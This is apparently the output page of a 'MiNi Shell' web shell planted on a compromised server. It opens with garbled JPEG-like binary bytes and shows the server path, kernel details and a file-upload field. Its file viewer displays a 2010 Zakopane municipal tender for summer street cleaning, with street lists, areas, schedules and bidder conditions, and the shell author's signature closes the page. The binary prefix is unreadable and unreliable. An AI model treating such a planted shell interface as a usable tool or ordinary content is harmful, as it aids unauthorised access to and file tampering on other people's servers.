JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100716/212236-N-2010.html

<p class="kh_header"><b>Zakopane: ZP/341/79/10 świadczenie usług polegających na oczyszczaniu  letnim jezdni, chodników, przejść , kładek, mostków, placów i innych terenów stanowiących własność  Gminy Miasta Zakopane  lub będących w jej zarządzie</b><br>
<b>Numer ogłoszenia: 212236 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/79/10 świadczenie usług polegających na oczyszczaniu  letnim jezdni, chodników, przejść , kładek, mostków, placów i innych terenów stanowiących własność  Gminy Miasta Zakopane  lub będących w jej zarządzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest świadczenie usług polegających na oczyszczeniu letnim jezdni, chodników, przejść , kładek, mostków, placów i innych terenów stanowiących własność  Gminy Miasta Zakopane  lub będących w jej zarządzie.
Zakres usług polega w szczególności na : 
-zamiataniu
-oczyszczaniu
-zmywaniu
-ręcznym sprzątaniu otoczenia oczka wodnego na ul. Krupówki oraz wokół elementów małej architektury (ławki, obudowy lamp, kosze na odpady itp. )
Oczyszczaniu letniemu podlegają : 

1)	 jezdnie i chodniki o łącznej powierzchni :   294.701 m2
 w tym: 
  -codziennie                             52 694 m2
 - jeden raz w tygodniu           242.007 m2

Wykaz ulic  objętych  letnim oczyszczaniem  jezdni  i chodników

Codziennie:

                                                                                                               Mb                   m2

1. Aleje 3-go Maja   					
    - od ul.Kościuszki do Krupówek                           624              8.211
    - od ul.Kościuszki do Ronda Solidarności             430             5.590
2. Chramcówki      					   628		  5.087
3. Generała Galicy                                                      140                840
4. Kamieniec						   550		  2.734
5. Kościuszki						
    - od skrzyżow. Z Al. 3-go Maja do Ronda AK      850             7.650
    - od Alei 3-go Maja do Poczty                               200             1.600
6. Krupówki-od Nowotarskiej  do PKO                     964             7.712
    - od Pomnika Zamoyskiego do Tetmajera             190             1.570
7. Staszica                                                                   110               770
8. Zamoyskiego                                                          885             8.280
9. Chodnik  ul,Kościuszki - prawa i lewa
    Strona przy działkach gminnych                            650             2.650
------------------------------------------------------------------------------------
                                RAZEM;                                6.221             52.694
-----------------------------------------------------------------------------------


Jeden raz w tygodniu:


1.	Chodnik - Aleje 3-go Maja strona lewa
Od  ul.Nowotarskiej do Kościuszki                      500              1.250
2. Broniewskiego                                                   900             3.600
3. Czecha                                                               770             5.390
4. Chodnik  - Br. Czecha  -od Żeromskiego 
    Do ul. Piłsudskiego                                           800             3.200
5. Droga do Białego                                              332             2.158
6. Droga na Bystre                                                 465            4.185
7. Droga do cmentarza -ul. Podhalańska               735            4.410
8. Droga do Olczy                                              4.833           34.798
9. Do Samków                                                       318             2.226
10.Gimnazjalna                                                     311             1.866
11.Goszczyńskiego                                               400             1.600
12. Grunwaldzka                                                   740             5.180
13. Jagiellońska                                                     842             5.843
14. Karłowicza                                                      632             3.750
15. Kasprusie                                                        870             6.090
16. Kościelna                                                        250                875
17. Kraszewskiego                                                250                911
18. Kuźnice - plac manewrowy                            300            2.130
19. Makuszyńskiego                                             618             3.742
20. Małe Żywczańskie                                           900            3.150
21. Modrzejewskiej                                               300             1.050
22. Orkana                                                             420             2.573
23. Park Miejski - alejki od Staszica
Do Grunwaldzkiej                                                 300             1.500
24. Pardałówka
      - Kurierów Tatrzańskich                                  442            2.652
      - Salwatoriańska                                               505            2.020
25. Partyzantów                                                     200               700
26. Przewodnika Krzeptowskiego                         685            4.136
27. Przewodników Tatrzańskich                         2.060          14.832
28. Piłsudskiego   -  chodnik
      Od Zaixu do ścieżki przed nr 28                   1.550            6.200
29. Piłsudskiego   -  chodnik
      Od TOPR do Br.Czecha                                  400             1.200
30. Równia Krupowa - chodniki                        2.200            6.300
31. Sabały                                                               300            1.800
32. Sienkiewicza                                                 1.120             7.400
33. Słoneczna                                                         520             1.560
34. Stolarczyka                                                      375             2.181
35. Strążyska                                                       1.361            8.166
36. Szpitalna                                                           280            1.400
37. Tetmajera                                                          750            4.526
38. Tuwima                                                             300            1.500
39. Weteranów Wojny                                            142               793
40. Wierchowa                                                        500            4.000
41. Witkiewicza                                                      300             1.800
42. Zborowskiego                                                   172             1.541
43. Zaruskiego                                                        184             1.315
44. Zwierzyniecka                                                  585             2.865
45. Żeromskiego                                                     970             5.852
46. Piłsudskiego                                                   1.434           10.038
47. Chałubińskiego                                              1.055             7.890
48. Kościeliska - Nowotarska
     Od Ronda Dmowskiego do granic
     Z Gminą Kościelisko                                   4.030              28.210
49. Nowotarska od Ronda Dmowskiego
     Do Ronda Solidarności                                   175                1.225
50. Nowotarska od Ronda Solidarności
     Do Ronda Chramca                                         835               5.428
51. Rondo Dmowskiego                                       100                  750
52. Rondo Solidarności                                        100                  750
53. Rondo Armii Krajowej                                   100                  750
54. Rondo Jana Pawła II                                       100                  750
----------------------------------------------------------------------------------
                                      RAZEM;                    40.616            242.007
----------------------------------------------------------------------------------

                          Ł Ą C Z N I E :                     46.837            294.701


 
2)	chodniki, place, kładki, schodki, przejścia dla pieszych o powierzchni                       13 577, 50 m2
 
Wykaz  chodników , placów, kładek, schodków i przejść dla pieszych objętych sprzątaniem letnim ręczno-mechanicznym


1. Aleje  3-Maja  700 m2

- chodnik od ul. Kościuszki w górę do przystanku
- chodnik od ul. Kościuszki wzdłuż Równi Dolnej do ulicy Nowotarskiej
- chodnik przy ul. Weteranów Wojny od Al. 3 Maja do bloku Nr 6
- przejście dla pieszych przez wysepkę naprzeciw ul. Weteranów Wojny
- przejście dla pieszych przez wysepkę koło banku PKO BP,

2. Ulica Brzozowa 50 m2
- chodnik wzdłuż ogrodzenia budynku ul. Kościuszki 21

3. Ulica Chałubińskiego 828 m2
- chodnik przy pomniku Sabały,
- chodnik przy posesji Państwa Chałubińskich
- chodnik przy blokach TBS
- wjazdy na osiedle TBS

4. Ulica Chramcówki 1473 m2
- chodnik wzdłuż i przez zieleńce przy rondzie Dr Chramca, poniżej bloku Nr 2 do
Płotu nieruchomości nr 2 w ulicy Kasprowicza,
- zatoka postojowa przy bloku Nr 3  sklep PSS 
- zatoka postojowa koło nr 32 powyżej TESCO
- chodnik wzdłuż bloków Chramcówki 15
- wjazd na osiedle TBS

5. Ulica Droga na Bystre 500 m2
- schodki od Dr na Bystre do Drogi na Antałówkę
- chodnik od nr 14 do 16  prawa strona
- most na potoku Bystry - Koło stacji benzynowej BP
- chodnik od wejścia na schodki do Imperialu

6. Ulica Droga na Gubałówkę 1120 m2
- od nr 2 - GALERIA- do słupków pod stacją PKL na Gubałówkę wraz z mostem

7. Ulica Generała Galicy 473,90 m2
- przepust przed nr 8 budynek nr 8 to dawna biblioteka
- chodnik od nr 8 do wjazdu do Kina Sokół plus przepust na potoku Czarnym
- chodnik pod pergolą od nr 7 dawna drukarnia do parku

8. Ulica Grunwaldzka 1000 m2
- chodnik wzdłuż parku miejskiego
- chodnik od nr 2 do ul. Partyzantów

9. Ulica Jagiellońska 80 m2
- most na potoku Bystry

10. Ulica Kasprowicza 517,90 m2
- schodki w kierunku ul. Tatary
- schodki do ul. Stromej
- narożnik - przejście - ul. Kasprowicza - ul. Szpitalna

11. Ulica Kasprusie 90 m2
- zatoka przy wjeździe do TTA
- zatoka i chodnik wzdłuż skarpy za wjazdem na ul. M.Żywczańskie

12. Ul. Kaszelewskiego 664,8 m2
- ul. Kaszelewskiego plus schodki do ul. Powstańców Śląskich

13. Ulica Kościeliska 100 m2
- chodnik od strony ulicy Kościelnej przy Drzewku Wolności

14. Ulica Kościuszki 811,40 m2
- przejście dla pieszych przez wysepki w rejonie Dworca PKI i PKP
- dolny chodnik od Baru FIS do ul. Sienkiewicza
- górny chodnik od Baru FIS do NR 20 sklep ROBAN

15. Ulica Krupówki 162,50 m2
- chodnik przy Równi Górnej od nr 73 do przejścia dla pieszych w kierunku Banku
PKO BP
- chodnik wzdłuż potoku Foluszowy w ciągu ul. Krupówki na wysokości Nr 40
ogródek P.Stocha

16. Ul. Makuszyńskiego 80 m2
- przepust między nr 16 a 18 plus mostek nad przepustem

17. Ul. Nowotarska 190 m2
- przejście przez zieleniec znajdujący się w ciągu ul. Szkolnej
- przejście piesze w ciągu Al.3 Maja przy Rondzie Solidarności

18. Ul. Orkana 310 m2
- most oraz chodnik przy potoku - od mostu do numeru 13

19. Ul. Tetmajera 30 m2
- przepusty - 2 szt.

20. Plac Niepodległości 60 m2
- chodnik wzdłuż placu niepodległości

21. Park Miejski 585 m2
- alejka od mostu przy byłej łaźni do DW Adria

22. Alejki w Parku FIS 890 m2
- alejki w parku FIS



23. Ulica Sienkiewicza 625 m2
- chodnik wzdłuż nr 4 L.O.
- schodki łączące ul. Sienkiewicza z ul. Kościuszki
- chodnik wzdłuż murku od mostku do nr 15
- schodki i kładka na potoku Bystry - przejście do ul. Piaseckiego

24. Ulica Słoneczna 606 m2
- wjazdy na osiedle

25. Ulica Strążyska 964 m2
- chodnik za wjazdem w ul. Droga do Daniela do Nr 7
- chodnik od ulicy Bogdańskiego do doliny Strążyskiej z wyłączeniem punktów
Handlowych

26. Ulica Szpitalna 384 m2
- chodnik od ul. Kasprowicza do mostu plus most
- chodnik za mostem wzdłuż skarpy do przepustu w ciągu ul. Ciągówka

27. Ul. Zamoyskiego 282 m2
- chodnik koło pomnika Sabały
- odcinek chodnika od nieruchomości nr 42a do drogi prowadzącej do ul.
Zwierzynieckiej wzdłuż granic działki 513 obr.12



UWAGA:
Sprzątanie chodników , placów i kładek odbywać się powinno wraz z pasem przyległym o szerokości 1 mb.

Harmonogram   sprzątania  chodników, placów, kładek, schodków  i przejść  dla pieszych  objętych sprzątaniem  letnim  ręczno - mechanicznym.

Poniedziałek
1.	Aleje 3-Maja   700 m2
- chodnik  od ul. Kościuszki w górę do przystanku 
- chodnik od ul. Kościuszki wzdłuż Równi Dolnej do ulicy Nowotarskiej
- chodnik przy ul. Weteranów Wojny  od Al. 3 Maja do bloku Nr 6
- przejście dla pieszych  przez wysepkę  naprzeciw  ul. Weteranów Wojny
- przejście dla pieszych  przez wysepkę koło banku PKO BP,
 
2.	Ulica Brzozowa  50 m2
- chodnik wzdłuż ogrodzenia  budynku ul. Kościuszki 21
      
3.	Ulica Chałubińskiego   828 m2
- chodnik przy pomniku Sabały,
- chodnik przy posesji Państwa Chałubińskich
- chodnik przy blokach TBS
- wjazdy na osiedle TBS

4.	Ulica Chramcówki  1473 m2
- chodnik  wzdłuż i przez zieleńce przy rondzie Dr Chramca, poniżej bloku Nr 2 do
  Płotu nieruchomości nr 2 w ulicy Kasprowicza,
- zatoka postojowa przy bloku Nr 3  sklep PSS 
- zatoka postojowa koło nr 32   powyżej TESCO
- chodnik wzdłuż bloków Chramcówki 15
- wjazd na osiedle TBS
Wtorek

1.	 Ulica Droga na Bystre  500 m2
- schodki od Dr na Bystre  do Drogi na Antałówkę
- chodnik  od nr 14 do 16   prawa strona
- most na potoku Bystry - Koło stacji benzynowej BP
- chodnik od wejścia na schodki do Imperialu
 
2.	Ulica Droga na Gubałówkę  1120 m2
- od nr 2 - GALERIA- do słupków pod stacją  PKL na Gubałówkę wraz z mostem
 
3.	Ulica Generała Galicy 473,90 m2
- przepust przed nr 8  budynek nr 8 to dawna biblioteka
- chodnik od nr 8 do wjazdu do Kina Sokół plus przepust na potoku Czarnym
- chodnik pod pergolą od nr 7 dawna drukarnia do parku





Środa
1.	Ulica Grunwaldzka 1000 m2
- chodnik wzdłuż parku miejskiego
- chodnik od nr 2  do ul. Partyzantów

2.	Ulica Jagiellońska  80 m2      
- most na potoku Bystry

3.	Ulica  Kasprowicza  517,90 m2  
- schodki w kierunku ul. Tatary
- schodki do ul. Stromej
- narożnik - przejście - ul. Kasprowicza - ul. Szpitalna

4.	Ulica Kasprusie  90 m2
- zatoka przy wjeździe do TTA
- zatoka i chodnik wzdłuż skarpy za wjazdem na ul. M.Żywczańskie

5.	Ul. Kaszelewskiego    664,8 m2
- ul. Kaszelewskiego plus schodki do ul. Powstańców Śląskich
 
6.	Ulica Kościeliska  100 m2
- chodnik od strony ulicy Kościelnej  przy Drzewku Wolności
Czwartek

1.	Ulica Kościuszki   811,40 m2
- przejście dla pieszych przez wysepki w rejonie Dworca PKI i PKP
- dolny chodnik od  Baru FIS do ul. Sienkiewicza
- górny chodnik od  Baru FIS do  NR 20 sklep ROBAN

2.	Ulica Krupówki  162,50 m2 
- chodnik przy Równi Górnej od nr 73 do przejścia dla pieszych  w kierunku  Banku PKO BP
- chodnik  wzdłuż potoku Foluszowy w ciągu ul. Krupówki  na wysokości Nr 40 ogródek P.Stocha

3.	Ul. Makuszyńskiego  80 m2
-  przepust  między nr 16 a 18  plus mostek nad przepustem

4.	Ul. Nowotarska  190 m2
- przejście przez zieleniec znajdujący się w ciągu ul. Szkolnej
- przejście piesze w ciągu Al.3 Maja przy Rondzie Solidarności

5.	Ul. Orkana  310 m2
- most  oraz chodnik przy potoku - od mostu do numeru 13

6.	Ul. Tetmajera  30 m2
- przepusty  - 2 szt.



7.	Plac Niepodległości  60 m2
- chodnik wzdłuż placu niepodległości

8.	Park Miejski  585 m2
- alejka od mostu przy byłej łaźni do DW Adria


9.	Alejki w Parku FIS  890 m2
- alejki w parku FIS
Piątek

1.	Ulica Sienkiewicza  625 m2
- chodnik wzdłuż nr 4  L.O.
- schodki  łączące ul. Sienkiewicza z ul. Kościuszki
- chodnik wzdłuż murku od mostku do nr 15
- schodki i kładka na potoku Bystry - przejście do ul. Piaseckiego
    
2.	Ulica Słoneczna  606 m2
- wjazdy na osiedle

3.	Ulica Strążyska  964 m2
- chodnik za wjazdem w ul. Droga do Daniela do Nr 7 
- chodnik  od ulicy Bogdańskiego do doliny Strążyskiej z wyłączeniem punktów handlowych

4.	Ulica Szpitalna  384 m2 
- chodnik od ul. Kasprowicza do mostu  plus most
- chodnik za mostem  wzdłuż skarpy do przepustu w ciągu ul. Ciągłówka

5.	Ul. Zamoyskiego  282 m2
- chodnik  koło pomnika Sabały
- odcinek  chodnika od nieruchomości nr 42a do drogi prowadzącej do ul. Zwierzynieckiej wzdłuż granic działki 513 obr.12.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże ,że posiada :
-aktualne zezwolenie na świadczenie usług w zakresie zbierania odpadów
komunalnych zgodnie z przepisami ustawy z dnia 13 września 1996 r. o utrzymaniu porządku i czystości w gminach (Dz. U. z 2005 r., Nr 236, poz. 2008 ze zm.)
-aktualne zezwolenie na świadczenie usług w zakresie transportu odpadów zgodnie
z ustawą z dnia 27.04.2001 r. o odpadach (Dz. U. z 2007 r., Nr 39, poz. 251 ze zm


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie: 
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  wykonał   co najmniej jedną usługę polegająca na letnim utrzymaniu ulic o powierzchni 250 000 m2
  
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże ,ze dysponuje  co najmniej: 
-4 szt. zamiatarek drogowych
-2 szt. zamiatarek chodnikowych
-2 szt. polewaczek


Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że  dopuszcza dokonanie zmian zawartej umowy w przypadku jeżeli konieczność wprowadzenia zmian wynika z okoliczności których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany są korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Drogownictwa i Transportu pok. 219
Urząd Miasta Zakopane
ul. Kosciuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 12:00, miejsce: Biuro ds zamówien publicznych pok. 8 
Urząd Miasta Zakopane
ul. Kosciuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com